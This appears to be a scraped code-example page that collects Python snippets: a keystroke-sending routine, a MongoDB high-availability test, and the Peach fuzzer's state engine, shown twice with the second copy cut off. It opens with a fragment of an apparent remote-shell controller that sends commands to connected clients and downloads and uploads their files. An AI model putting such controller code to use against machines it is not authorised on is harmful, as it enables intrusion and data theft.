				refresh()
				active = False
				break

			# exit client session
			if data == 'quitted':
				# print message
				print "Exit.\n"
				# remove from arrays
				socks[activate].close()
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				# sleep and refresh
				time.sleep(0.8)
				refresh()
				active = False
				break
			# if data exists
			elif data != '':
				# get next command
				sys.stdout.write(data)
				nextcmd = raw_input()
		
			# download
			if nextcmd.startswith("download ") == True:
				if len(nextcmd.split(' ')) > 2:
					download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					download(socks[activate], nextcmd.split(' ')[1])
		
			# upload
			elif nextcmd.startswith("upload ") == True:
				if len(nextcmd.split(' ')) > 2:
					upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					upload(socks[activate], nextcmd.split(' ')[1])
		
			# normal command
			elif nextcmd != '':
				Send(socks[activate], nextcmd)

			elif nextcmd == '':

				print 'Think before you type. ;)\n'

Example 35

Project: AoikHotkey
Source File: sendkey_winos.py
View license
def keys_stroke(
    vks,
    vks_pressed=[],
    key_duration=None,
    key_interval=None,
    modifier_interval=None,
    release_initial_keys=True,
    restore_initial_modifiers=True,
):
    """
    Send keys, without being interfered by previously pressed modifier keys.

    :param vks: Virtual keys to send.

    :param vks_pressed: Virtual keys that are currently pressed.

    :param key_duration: Duration between sending key-down and key-up events \
        for a non-modifier key.

    :param key_interval: Interval between sending events for two consecutive
        non-modifier keys.

    :param modifier_interval: Delay between sending key-down events for two \
        consecutive modifier keys.

    :param release_initial_keys: Whether send key-up events to release \
        non-modifier keys that were pressed before sending the keys. Notice
        initial modifier keys will always be released to avoid interference.

    :param restore_initial_modifiers: Whether send key-down events to press \
        modifier keys that were pressed before sending the keys.

    :return: None.
    """
    # Whether last virtual key is modifier.
    # Initial value being True is required by code at 2NG2A.
    last_vk_is_modifier = True

    # Group list.
    # Each group is a tuple of (modifier_s, non_modifier_s).
    group_s = []

    # Current group's modifier virtual key list
    modifier_s = []

    # Current group's non-modifier virtual key list
    non_modifier_s = []

    # Virtual key index
    vk_idx = 0

    # Virtual key list length
    vks_len = len(vks)

    # While have remaining virtual keys
    while vk_idx < vks_len:
        # Get a virtual key
        vk = vks[vk_idx]

        # Increment the virtual key index
        vk_idx += 1

        # 2NG2A
        # If last virtual key is not modifier,
        # it means the end of a group.
        if not last_vk_is_modifier:
            # Add the group's modifiers and non-modifiers to the group list
            group_s.append((modifier_s, non_modifier_s))

            # Set the modifier virtual key list be empty for next group
            modifier_s = []

            # Set the non-modifier virtual key list be empty for next group
            non_modifier_s = []

        # If the virtual key is modifier
        if vk in _MODIFIER_VKS:
            # Add the virtual key to the modifier virtual key list
            modifier_s.append(vk)

            # Set last virtual key is modifier be True
            last_vk_is_modifier = True

        # If the virtual key is not modifier
        else:
            # Add the virtual key to the non-modifier virtual key list
            non_modifier_s.append(vk)

            # Set last virtual key is modifier be False
            last_vk_is_modifier = False

    # If the modifier or non-modifier virtual key list is not empty
    if modifier_s or non_modifier_s:
        # Add the last group's modifiers and non-modifiers to the group list
        group_s.append((modifier_s, non_modifier_s))

    # Set the modifier virtual key list be None
    modifier_s = None

    # Set the non-modifier virtual key list be None
    non_modifier_s = None

    # Get initial group's modifier and non-modifier virtual key lists
    initial_group = (
        tuple(vk for vk in vks_pressed if vk in _MODIFIER_VKS),
        tuple(vk for vk in vks_pressed if vk not in _MODIFIER_VKS),
    )

    # If need release initial non-modifier keys
    if release_initial_keys:
        # For initial group's each non-modifier virtual key
        for vk in initial_group[1]:
            # Send key-up event
            key_up_sc(vk)

    # Use the initial group as the initial previous group
    previous_group = initial_group

    # Get max group index
    group_idx_max = len(group_s) - 1

    # For the group list's each group
    for group_idx, group in enumerate(group_s):
        # Get previous group's modifiers
        modifier_s_old, _ = previous_group

        # Get current group's modifiers and non-modifiers
        modifier_s_new, non_modifier_s_new = group

        # ----- Press new modifiers -----
        # Get max index of the new modifier list
        vk_idx_max = len(modifier_s_new) - 1

        # For the new modifier list's each virtual key
        for vk_idx, vk in enumerate(modifier_s_new):
            # Send key-down event
            key_dn_sc(vk)

            # If have modifier interval
            if modifier_interval:
                # If the index is not the max index
                if vk_idx != vk_idx_max:
                    # Sleep for modifier interval
                    _time.sleep(modifier_interval)
        # ===== Press new modifiers =====

        # ----- Release old modifiers -----
        # Get the two modifier lists' difference list.
        # The difference list contains the modifiers that should be released.
        modifier_s_diff = _list_diff(modifier_s_old, modifier_s_new)

        # For the difference list's each virtual key
        for vk in modifier_s_diff:
            # Send key-up event.
            #
            # Use `key_up_sc` because `key_up` does not work for DirectInput.
            key_up_sc(vk)
        # ===== Release old modifiers =====

        # ----- Press new non-modifiers -----
        # Get max index of the new non-modifier list
        vk_idx_max = len(non_modifier_s_new) - 1

        # For the new non-modifier list's each virtual key
        for vk_idx, vk in enumerate(non_modifier_s_new):
            # Send key-down event.
            #
            # Use `key_dn_sc` because `key_dn` does not work for DirectInput.
            key_dn_sc(vk)

            # If have key duration
            if key_duration:
                # If the index is not the max index
                if vk_idx != vk_idx_max:
                    # Sleep for key duration
                    _time.sleep(key_duration)

            # Send key-up event
            key_up_sc(vk)
        # ===== Press new non-modifiers =====

        # ----- Release new non-modifiers -----
        # For the new non-modifier list's each virtual key
        for vk in reversed(modifier_s_new):
            # Send key-up event
            key_up_sc(vk)
        # ===== Release new non-modifiers =====

        # Set the previous group be the current group for next group
        previous_group = group

        # If have key interval
        if key_interval:
            # If is not the last group
            if group_idx != group_idx_max:
                # Sleep for key interval
                _time.sleep(key_interval)

    # If need restore initial modifiers after sending the keys
    if restore_initial_modifiers:
        # If the initial group is not the only group
        if previous_group is not initial_group:
            # Get initial group's modifier list
            initial_modifier_s, _ = initial_group

            # Get the max index
            vk_idx_max = len(initial_modifier_s) - 1

            # For initial group's modifier list's each virtual key
            for vk_idx, vk in enumerate(initial_modifier_s):
                # Send key-down event
                key_dn_sc(vk)

                # If have modifier interval
                if modifier_interval:
                    # If the index is not the max index
                    if vk_idx != vk_idx_max:
                        # Sleep for modifier interval
                        _time.sleep(modifier_interval)

Example 36

Project: mongo-python-driver
Source File: test_ha.py
View license
    def test_read_preference(self):
        # We pass through four states:
        #
        #       1. A primary and two secondaries
        #       2. Primary down
        #       3. Primary up, one secondary down
        #       4. Primary up, all secondaries down
        #
        # For each state, we verify the behavior of PRIMARY,
        # PRIMARY_PREFERRED, SECONDARY, SECONDARY_PREFERRED, and NEAREST
        c = MongoClient(
            self.seed,
            replicaSet=self.name,
            serverSelectionTimeoutMS=self.server_selection_timeout)
        wait_until(lambda: c.primary, "discover primary")
        wait_until(lambda: len(c.secondaries) == 2, "discover secondaries")

        def assertReadFrom(member, *args, **kwargs):
            utils.assertReadFrom(self, c, member, *args, **kwargs)

        def assertReadFromAll(members, *args, **kwargs):
            utils.assertReadFromAll(self, c, members, *args, **kwargs)

        def unpartition_node(node):
            host, port = node
            return '%s:%s' % (host, port)

        # To make the code terser, copy hosts into local scope
        primary = self.primary
        secondary = self.secondary
        other_secondary = self.other_secondary

        bad_tag = {'bad': 'tag'}

        # 1. THREE MEMBERS UP -------------------------------------------------
        #       PRIMARY
        assertReadFrom(primary, PRIMARY)

        #       PRIMARY_PREFERRED
        # Trivial: mode and tags both match
        assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)

        # Secondary matches but not primary, choose primary
        assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)

        # Chooses primary, ignoring tag sets
        assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)

        # Chooses primary, ignoring tag sets
        assertReadFrom(primary, PRIMARY_PREFERRED, bad_tag)
        assertReadFrom(primary, PRIMARY_PREFERRED, [bad_tag, {}])

        #       SECONDARY
        assertReadFromAll([secondary, other_secondary], SECONDARY)

        #       SECONDARY_PREFERRED
        assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)

        # Multiple tags
        assertReadFrom(secondary, SECONDARY_PREFERRED, self.secondary_tags)

        # Fall back to primary if it's the only one matching the tags
        assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'primary'})

        # No matching secondaries
        assertReadFrom(primary, SECONDARY_PREFERRED, bad_tag)

        # Fall back from non-matching tag set to matching set
        assertReadFromAll([secondary, other_secondary],
            SECONDARY_PREFERRED, [bad_tag, {}])

        assertReadFrom(other_secondary,
            SECONDARY_PREFERRED, [bad_tag, {'dc': 'ny'}])

        #       NEAREST
        self.clear_ping_times()

        assertReadFromAll([primary, secondary, other_secondary], NEAREST)

        assertReadFromAll([primary, other_secondary],
            NEAREST, [bad_tag, {'dc': 'ny'}])

        self.set_ping_time(primary, 0)
        self.set_ping_time(secondary, .03) # 30 ms
        self.set_ping_time(other_secondary, 10)

        # Nearest member, no tags
        assertReadFrom(primary, NEAREST)

        # Tags override nearness
        assertReadFrom(primary, NEAREST, {'name': 'primary'})
        assertReadFrom(secondary, NEAREST, self.secondary_dc)

        # Make secondary fast
        self.set_ping_time(primary, .03) # 30 ms
        self.set_ping_time(secondary, 0)

        assertReadFrom(secondary, NEAREST)

        # Other secondary fast
        self.set_ping_time(secondary, 10)
        self.set_ping_time(other_secondary, 0)

        assertReadFrom(other_secondary, NEAREST)

        self.clear_ping_times()

        assertReadFromAll([primary, other_secondary], NEAREST, [{'dc': 'ny'}])

        # 2. PRIMARY DOWN -----------------------------------------------------
        killed = ha_tools.kill_primary()

        # Let monitor notice primary's gone
        time.sleep(2 * self.heartbeat_frequency)

        #       PRIMARY
        assertReadFrom(None, PRIMARY)

        #       PRIMARY_PREFERRED
        # No primary, choose matching secondary
        assertReadFromAll([secondary, other_secondary], PRIMARY_PREFERRED)
        assertReadFrom(secondary, PRIMARY_PREFERRED, {'name': 'secondary'})

        # No primary or matching secondary
        assertReadFrom(None, PRIMARY_PREFERRED, bad_tag)

        #       SECONDARY
        assertReadFromAll([secondary, other_secondary], SECONDARY)

        # Only primary matches
        assertReadFrom(None, SECONDARY, {'name': 'primary'})

        # No matching secondaries
        assertReadFrom(None, SECONDARY, bad_tag)

        #       SECONDARY_PREFERRED
        assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)

        # Mode and tags both match
        assertReadFrom(secondary, SECONDARY_PREFERRED, {'name': 'secondary'})

        #       NEAREST
        self.clear_ping_times()

        assertReadFromAll([secondary, other_secondary], NEAREST)

        # 3. PRIMARY UP, ONE SECONDARY DOWN -----------------------------------
        ha_tools.restart_members([killed])
        ha_tools.wait_for_primary()

        ha_tools.kill_members([unpartition_node(secondary)], 2)
        time.sleep(5)
        ha_tools.wait_for_primary()
        time.sleep(2 * self.heartbeat_frequency)

        #       PRIMARY
        assertReadFrom(primary, PRIMARY)

        #       PRIMARY_PREFERRED
        assertReadFrom(primary, PRIMARY_PREFERRED)

        #       SECONDARY
        assertReadFrom(other_secondary, SECONDARY)
        assertReadFrom(other_secondary, SECONDARY, self.other_secondary_dc)

        # Only the down secondary matches
        assertReadFrom(None, SECONDARY, {'name': 'secondary'})

        #       SECONDARY_PREFERRED
        assertReadFrom(other_secondary, SECONDARY_PREFERRED)
        assertReadFrom(
            other_secondary, SECONDARY_PREFERRED, self.other_secondary_dc)

        # The secondary matching the tag is down, use primary
        assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})

        #       NEAREST
        assertReadFromAll([primary, other_secondary], NEAREST)
        assertReadFrom(other_secondary, NEAREST, {'name': 'other_secondary'})
        assertReadFrom(primary, NEAREST, {'name': 'primary'})

        # 4. PRIMARY UP, ALL SECONDARIES DOWN ---------------------------------
        ha_tools.kill_members([unpartition_node(other_secondary)], 2)

        #       PRIMARY
        assertReadFrom(primary, PRIMARY)

        #       PRIMARY_PREFERRED
        assertReadFrom(primary, PRIMARY_PREFERRED)
        assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)

        #       SECONDARY
        assertReadFrom(None, SECONDARY)
        assertReadFrom(None, SECONDARY, self.other_secondary_dc)
        assertReadFrom(None, SECONDARY, {'dc': 'ny'})

        #       SECONDARY_PREFERRED
        assertReadFrom(primary, SECONDARY_PREFERRED)
        assertReadFrom(primary, SECONDARY_PREFERRED, self.secondary_dc)
        assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})
        assertReadFrom(primary, SECONDARY_PREFERRED, {'dc': 'ny'})

        #       NEAREST
        assertReadFrom(primary, NEAREST)
        assertReadFrom(None, NEAREST, self.secondary_dc)
        assertReadFrom(None, NEAREST, {'name': 'secondary'})

        # Even if primary's slow, still read from it
        self.set_ping_time(primary, 100)
        assertReadFrom(primary, NEAREST)
        assertReadFrom(None, NEAREST, self.secondary_dc)

        self.clear_ping_times()

Example 37

Project: peach
Source File: state.py
View license
    def _runAction(self, action, mutator):
        Debug(1, "\nStateEngine._runAction: %s" % action.name)

        mutator.onActionStarting(action.parent, action)

        # If publisher property has been given, use referenced Publisher; otherwise the first one
        if action.publisher is not None:
            pub = self._getPublisherByName(action.publisher)

            if pub is None:
                raise PeachException("Publisher '%s' not found!" % action.publisher)
        else:
            pub = self.publishers[0]

        # EVENT: when
        if action.when is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'StateModel': action.parent.parent,
                'Mutator': mutator,
                'peachPrint': self.f,
                'sleep': time.sleep,
                'getXml': self.getXml,
                'random': random
            }

            if not evalEvent(action.when, environment, self.engine.peach):
                Debug(1, "Action when failed: " + action.when)
                return
            else:
                Debug(1, "Action when passed: " + action.when)

        Engine.context.watcher.OnActionStart(action)

        # EVENT: onStart
        if action.onStart is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'StateModel': action.parent.parent,
                'Mutator': mutator,
                'peachPrint': self.f,
                'sleep': time.sleep
            }

            evalEvent(action.onStart, environment, self.engine.peach)

        if action.type == 'input':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True
            if not pub.hasBeenConnected:
                pub.connect()
                pub.hasBeenConnected = True

            # Make a fresh copy of the template
            action.__delitem__(action.template.name)
            action.template = action.origionalTemplate.copy(action)
            action.append(action.template)

            # Create buffer
            buff = PublisherBuffer(pub)
            self.dirtyXmlCache()

            # Crack data
            cracker = DataCracker(self.engine.peach)
            (rating, _) = cracker.crackData(action.template, buff, "setDefaultValue")

            if rating > 2:
                raise SoftException("Was unble to crack incoming data into %s data model." % action.template.name)

            action.value = action.template.getValue()

        elif action.type == 'output':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True
            if not pub.hasBeenConnected:
                pub.connect()
                pub.hasBeenConnected = True

            # Run mutator
            mutator.onDataModelGetValue(action, action.template)

            # Get value
            if action.template.modelHasOffsetRelation:
                stringBuffer = StreamBuffer()
                action.template.getValue(stringBuffer)

                stringBuffer.setValue("")
                stringBuffer.seekFromStart(0)
                action.template.getValue(stringBuffer)

                action.value = stringBuffer.getValue()

            else:
                action.value = action.template.getValue()

            Debug(1, "Action output sending %d bytes" % len(action.value))

            if not pub.withNode:
                pub.send(action.value)
            else:
                pub.sendWithNode(action.value, action.template)

            # Save the data filename used for later matching
            if action.data is not None and action.data.fileName is not None:
                self.actionValues.append([action.name, 'output', action.value, action.data.fileName])

            else:
                self.actionValues.append([action.name, 'output', action.value])

            obj = Element(action.name, None)
            obj.elementType = 'dom'
            obj.defaultValue = action.value
            action.value = obj

        elif action.type == 'call':
            action.value = None

            actionParams = []

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            method = action.method
            if method is None:
                raise PeachException("StateEngine: Action of type \"call\" does not have method name!")

            params = []
            for c in action:
                if c.elementType == 'actionparam':
                    params.append(c)

            argNodes = []
            argValues = []
            for p in params:
                if p.type == 'out' or p.type == 'inout':
                    raise PeachException(
                        "StateEngine: Action of type \"call\" does not yet support out or inout parameters (bug in comtypes)!")

                # Run mutator
                mutator.onDataModelGetValue(action, p.template)

                # Get value
                if p.template.modelHasOffsetRelation:
                    stringBuffer = StreamBuffer()
                    p.template.getValue(stringBuffer)
                    stringBuffer.setValue("")
                    stringBuffer.seekFromStart(0)
                    p.template.getValue(stringBuffer)

                    p.value = stringBuffer.getValue()

                else:
                    p.value = p.template.getValue()

                argValues.append(p.value)
                argNodes.append(p.template)

                actionParams.append([p.name, 'param', p.value])

            if not pub.withNode:
                ret = pub.call(method, argValues)
            else:
                ret = pub.callWithNode(method, argValues, argNodes)

            # look for and set return
            for c in action:
                if c.elementType == 'actionresult':
                    self.dirtyXmlCache()

                    print("RET: %s %s" % (ret, type(ret)))

                    data = None
                    if type(ret) == int:
                        data = struct.pack("i", ret)
                    elif type(ret) == long:
                        data = struct.pack("q", ret)
                    elif type(ret) == str:
                        data = ret

                    if c.template.isPointer:
                        print("Found ctypes pointer...trying to cast...")
                        retCtype = c.template.asCTypeType()
                        retCast = ctypes.cast(ret, retCtype)

                        for i in range(len(retCast.contents._fields_)):
                            (key, value) = retCast.contents._fields_[i]
                            value = eval("retCast.contents.%s" % key)
                            c.template[key].defaultValue = value
                            print("Set [%s=%s]" % (key, value))

                    else:
                        cracker = DataCracker(self.engine.peach)
                        cracker.haveAllData = True
                        (rating, _) = cracker.crackData(c.template, PublisherBuffer(None, data, True))
                        if rating > 2:
                            raise SoftException("Was unble to crack result data into %s data model." % c.template.name)

            self.actionValues.append([action.name, 'call', method, actionParams])

        elif action.type == 'getprop':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            property = action.property
            if property is None:
                raise Exception("StateEngine._runAction(): getprop type does not have property name!")

            data = pub.property(property)

            self.actionValues.append([action.name, 'getprop', property, data])

            self.dirtyXmlCache()

            cracker = DataCracker(self.engine.peach)
            (rating, _) = cracker.crackData(action.template, PublisherBuffer(None, data))
            if rating > 2:
                raise SoftException("Was unble to crack getprop data into %s data model." % action.template.name)

            # If no exception, it worked

            action.value = action.template.getValue()

            if Peach.Engine.engine.Engine.debug:
                print("*******POST GETPROP***********")
                doc = self.getXml()
                print(etree.tostring(doc, method="html", pretty_print=True))
                print("******************")

        elif action.type == 'setprop':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            property = action.property
            if property is None:
                raise Exception("StateEngine: setprop type does not have property name!")

            value = None
            valueNode = None
            for c in action:
                if c.elementType == 'actionparam' and c.type == "in":
                    # Run mutator
                    mutator.onDataModelGetValue(action, c.template)

                    # Get value
                    if c.template.modelHasOffsetRelation:
                        stringBuffer = StreamBuffer()
                        c.template.getValue(stringBuffer)
                        stringBuffer.setValue("")
                        stringBuffer.seekFromStart(0)
                        c.template.getValue(stringBuffer)

                        value = c.value = stringBuffer.getValue()

                    else:
                        value = c.value = c.template.getValue()

                    valueNode = c.template
                    break

            if not pub.withNode:
                pub.property(property, value)
            else:
                pub.propertyWithNode(property, value, valueNode)

            self.actionValues.append([action.name, 'setprop', property, value])

        elif action.type == 'changeState':
            action.value = None
            self.actionValues.append([action.name, 'changeState', action.ref])
            mutator.onActionFinished(action.parent, action)
            raise StateChangeStateException(self._getStateByName(action.ref))

        elif action.type == 'slurp':
            action.value = None

            #startTime = time.time()

            doc = self.getXml()
            setNodes = doc.xpath(action.setXpath)
            if len(setNodes) == 0:
                print(etree.tostring(doc, method="html", pretty_print=True))
                raise PeachException("Slurp [%s] setXpath [%s] did not return a node" % (action.name, action.setXpath))

            # Only do this once :)
            valueElement = None
            if action.valueXpath is not None:
                valueNodes = doc.xpath(action.valueXpath)
                if len(valueNodes) == 0:
                    print("Warning: valueXpath did not return a node")
                    raise SoftException("StateEngine._runAction(xpath): valueXpath did not return a node")

                valueNode = valueNodes[0]
                try:
                    valueElement = action.getRoot().getByName(str(valueNode.get("fullName")))

                except:
                    print("valueNode: %s" % valueNode)
                    print("valueNode.nodeName: %s" % split_ns(valueNode.tag)[1])
                    print("valueXpath: %s" % action.valueXpath)
                    print("results: %d" % len(valueNodes))
                    raise PeachException("Slurp AttributeError: [%s]" % str(valueNode.get("fullName")))

            for node in setNodes:
                setElement = action.getRoot().getByName(str(node.get("fullName")))

                if valueElement is not None:
                    Debug(1, "Action-Slurp: 1 Setting %s from %s" % (
                        str(node.get("fullName")),
                        str(valueNode.get("fullName"))
                    ))

                    valueElement = action.getRoot().getByName(str(valueNode.get("fullName")))

                    # Some elements like Block do not have a current or default value
                    if valueElement.currentValue is None and valueElement.defaultValue is None:
                        setElement.currentValue = None
                        setElement.defaultValue = valueElement.getValue()

                    else:
                        setElement.currentValue = valueElement.getValue()
                        setElement.defaultValue = valueElement.defaultValue

                    setElement.value = None

                #print " --- valueElement --- "
                #pub.send(valueElement.getValue())
                #print " --- setElement --- "
                #pub.send(setElement.getValue())
                #print " --------------------"

                else:
                    Debug(1, "Action-Slurp: 2 Setting %s to %s" % (
                        str(node.get("fullName")),
                        repr(action.valueLiteral)
                    ))

                    setElement.defaultValue = action.valueLiteral
                    setElement.currentValue = None
                    setElement.value = None

                    #print " - Total time to slurp data: %.2f" % (time.time() - startTime)

        elif action.type == 'connect':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            pub.connect()
            pub.hasBeenConnected = True

        elif action.type == 'accept':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            pub.accept()
            pub.hasBeenConnected = True

        elif action.type == 'close':
            if not pub.hasBeenConnected:
                # If we haven't been opened lets ignore
                # this close.
                return

            pub.close()
            pub.hasBeenConnected = False

        elif action.type == 'start':
            pub.start()
            pub.hasBeenStarted = True

        elif action.type == 'stop':
            if pub.hasBeenStarted:
                pub.stop()
                pub.hasBeenStarted = False

        elif action.type == 'wait':
            time.sleep(float(action.valueLiteral))

        else:
            raise Exception("StateEngine._runAction(): Unknown action.type of [%s]" % str(action.type))

        # EVENT: onComplete
        if action.onComplete is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'Mutator': mutator,
                'StateModel': action.parent.parent,
                'sleep': time.sleep
            }

            evalEvent(action.onComplete, environment, self.engine.peach)

        mutator.onActionFinished(action.parent, action)
        Engine.context.watcher.OnActionComplete(action)

Example 38

Project: peach
Source File: state.py
View license
    def _runAction(self, action, mutator):
        Debug(1, "\nStateEngine._runAction: %s" % action.name)

        mutator.onActionStarting(action.parent, action)

        # If publisher property has been given, use referenced Publisher; otherwise the first one
        if action.publisher is not None:
            pub = self._getPublisherByName(action.publisher)

            if pub is None:
                raise PeachException("Publisher '%s' not found!" % action.publisher)
        else:
            pub = self.publishers[0]

        # EVENT: when
        if action.when is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'StateModel': action.parent.parent,
                'Mutator': mutator,
                'peachPrint': self.f,
                'sleep': time.sleep,
                'getXml': self.getXml,
                'random': random
            }

            if not evalEvent(action.when, environment, self.engine.peach):
                Debug(1, "Action when failed: " + action.when)
                return
            else:
                Debug(1, "Action when passed: " + action.when)

        Engine.context.watcher.OnActionStart(action)

        # EVENT: onStart
        if action.onStart is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'StateModel': action.parent.parent,
                'Mutator': mutator,
                'peachPrint': self.f,
                'sleep': time.sleep
            }

            evalEvent(action.onStart, environment, self.engine.peach)

        if action.type == 'input':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True
            if not pub.hasBeenConnected:
                pub.connect()
                pub.hasBeenConnected = True

            # Make a fresh copy of the template
            action.__delitem__(action.template.name)
            action.template = action.origionalTemplate.copy(action)
            action.append(action.template)

            # Create buffer
            buff = PublisherBuffer(pub)
            self.dirtyXmlCache()

            # Crack data
            cracker = DataCracker(self.engine.peach)
            (rating, _) = cracker.crackData(action.template, buff, "setDefaultValue")

            if rating > 2:
                raise SoftException("Was unble to crack incoming data into %s data model." % action.template.name)

            action.value = action.template.getValue()

        elif action.type == 'output':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True
            if not pub.hasBeenConnected:
                pub.connect()
                pub.hasBeenConnected = True

            # Run mutator
            mutator.onDataModelGetValue(action, action.template)

            # Get value
            if action.template.modelHasOffsetRelation:
                stringBuffer = StreamBuffer()
                action.template.getValue(stringBuffer)

                stringBuffer.setValue("")
                stringBuffer.seekFromStart(0)
                action.template.getValue(stringBuffer)

                action.value = stringBuffer.getValue()

            else:
                action.value = action.template.getValue()

            Debug(1, "Action output sending %d bytes" % len(action.value))

            if not pub.withNode:
                pub.send(action.value)
            else:
                pub.sendWithNode(action.value, action.template)

            # Save the data filename used for later matching
            if action.data is not None and action.data.fileName is not None:
                self.actionValues.append([action.name, 'output', action.value, action.data.fileName])

            else:
                self.actionValues.append([action.name, 'output', action.value])

            obj = Element(action.name, None)
            obj.elementType = 'dom'
            obj.defaultValue = action.value
            action.value = obj

        elif action.type == 'call':
            action.value = None

            actionParams = []

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            method = action.method
            if method is None:
                raise PeachException("StateEngine: Action of type \"call\" does not have method name!")

            params = []
            for c in action:
                if c.elementType == 'actionparam':
                    params.append(c)

            argNodes = []
            argValues = []
            for p in params:
                if p.type == 'out' or p.type == 'inout':
                    raise PeachException(
                        "StateEngine: Action of type \"call\" does not yet support out or inout parameters (bug in comtypes)!")

                # Run mutator
                mutator.onDataModelGetValue(action, p.template)

                # Get value
                if p.template.modelHasOffsetRelation:
                    stringBuffer = StreamBuffer()
                    p.template.getValue(stringBuffer)
                    stringBuffer.setValue("")
                    stringBuffer.seekFromStart(0)
                    p.template.getValue(stringBuffer)

                    p.value = stringBuffer.getValue()

                else:
                    p.value = p.template.getValue()

                argValues.append(p.value)
                argNodes.append(p.template)

                actionParams.append([p.name, 'param', p.value])

            if not pub.withNode:
                ret = pub.call(method, argValues)
            else:
                ret = pub.callWithNode(method, argValues, argNodes)

            # look for and set return
            for c in action:
                if c.elementType == 'actionresult':
                    self.dirtyXmlCache()

                    print("RET: %s %s" % (ret, type(ret)))

                    data = None
                    if type(ret) == int:
                        data = struct.pack("i", ret)
                    elif type(ret) == long:
                        data = struct.pack("q", ret)
                    elif type(ret) == str:
                        data = ret

                    if c.template.isPointer:
                        print("Found ctypes pointer...trying to cast...")
                        retCtype = c.template.asCTypeType()
                        retCast = ctypes.cast(ret, retCtype)

                        for i in range(len(retCast.contents._fields_)):
                            (key, value) = retCast.contents._fields_[i]
                            value = eval("retCast.contents.%s" % key)
                            c.template[key].defaultValue = value
                            print("Set [%s=%s]" % (key, value))

                    else:
                        cracker = DataCracker(self.engine.peach)
                        cracker.haveAllData = True
                        (rating, _) = cracker.crackData(c.template, PublisherBuffer(None, data, True))
                        if rating > 2:
                            raise SoftException("Was unble to crack result data into %s data model." % c.template.name)

            self.actionValues.append([action.name, 'call', method, actionParams])

        elif action.type == 'getprop':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            property = action.property
            if property is None:
                raise Exception("StateEngine._runAction(): getprop type does not have property name!")

            data = pub.property(property)

            self.actionValues.append([action.name, 'getprop', property, data])

            self.dirtyXmlCache()

            cracker = DataCracker(self.engine.peach)
            (rating, _) = cracker.crackData(action.template, PublisherBuffer(None, data))
            if rating > 2:
                raise SoftException("Was unble to crack getprop data into %s data model." % action.template.name)

            # If no exception, it worked

            action.value = action.template.getValue()

            if Peach.Engine.engine.Engine.debug:
                print("*******POST GETPROP***********")
                doc = self.getXml()
                print(etree.tostring(doc, method="html", pretty_print=True))
                print("******************")

        elif action.type == 'setprop':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            property = action.property
            if property is None:
                raise Exception("StateEngine: setprop type does not have property name!")

            value = None
            valueNode = None
            for c in action:
                if c.elementType == 'actionparam' and c.type == "in":
                    # Run mutator
                    mutator.onDataModelGetValue(action, c.template)

                    # Get value
                    if c.template.modelHasOffsetRelation:
                        stringBuffer = StreamBuffer()
                        c.template.getValue(stringBuffer)
                        stringBuffer.setValue("")
                        stringBuffer.seekFromStart(0)
                        c.template.getValue(stringBuffer)

                        value = c.value = stringBuffer.getValue()

                    else:
                        value = c.value = c.template.getValue()

                    valueNode = c.template
                    break

            if not pub.withNode:
                pub.property(property, value)
            else:
                pub.propertyWithNode(property, value, valueNode)

            self.actionValues.append([action.name, 'setprop', property, value])

        elif action.type == 'changeState':
            action.value = None
            self.actionValues.append([action.name, 'changeState', action.ref])
            mutator.onActionFinished(action.parent, action)
            raise StateChangeStateException(self._getStateByName(action.ref))

        elif action.type == 'slurp':
            action.value = None

            #startTime = time.time()

            doc = self.getXml()
            setNodes = doc.xpath(action.setXpath)
            if len(setNodes) == 0:
                print(etree.tostring(doc, method="html", pretty_print=True))
                raise PeachException("Slurp [%s] setXpath [%s] did not return a node" % (action.name, action.setXpath))

            # Only do this once :)
            valueElement = None
            if action.valueXpath is not None:
                valueNodes = doc.xpath(action.valueXpath)
                if len(valueNodes) == 0:
                    print("Warning: valueXpath did not return a node")
                    raise SoftException("StateEngine._runAction(xpath): valueXpath did not return a node")

                valueNode = valueNodes[0]
                try:
                    valueElement = action.getRoot().getByName(str(valueNode.get("fullName")))

                except:
                    print("valueNode: %s" % valueNode)
                    print("valueNode.nodeName: %s" % split_ns(valueNode.tag)[1])
                    print("valueXpath: %s" % action.valueXpath)
                    print("results: %d" % len(valueNodes))
                    raise PeachException("Slurp AttributeError: [%s]" % str(valueNode.get("fullName")))

            for node in setNodes:
                setElement = action.getRoot().getByName(str(node.get("fullName")))

                if valueElement is not None:
                    Debug(1, "Action-Slurp: 1 Setting %s from %s" % (
                        str(node.get("fullName")),
                        str(valueNode.get("fullName"))
                    ))

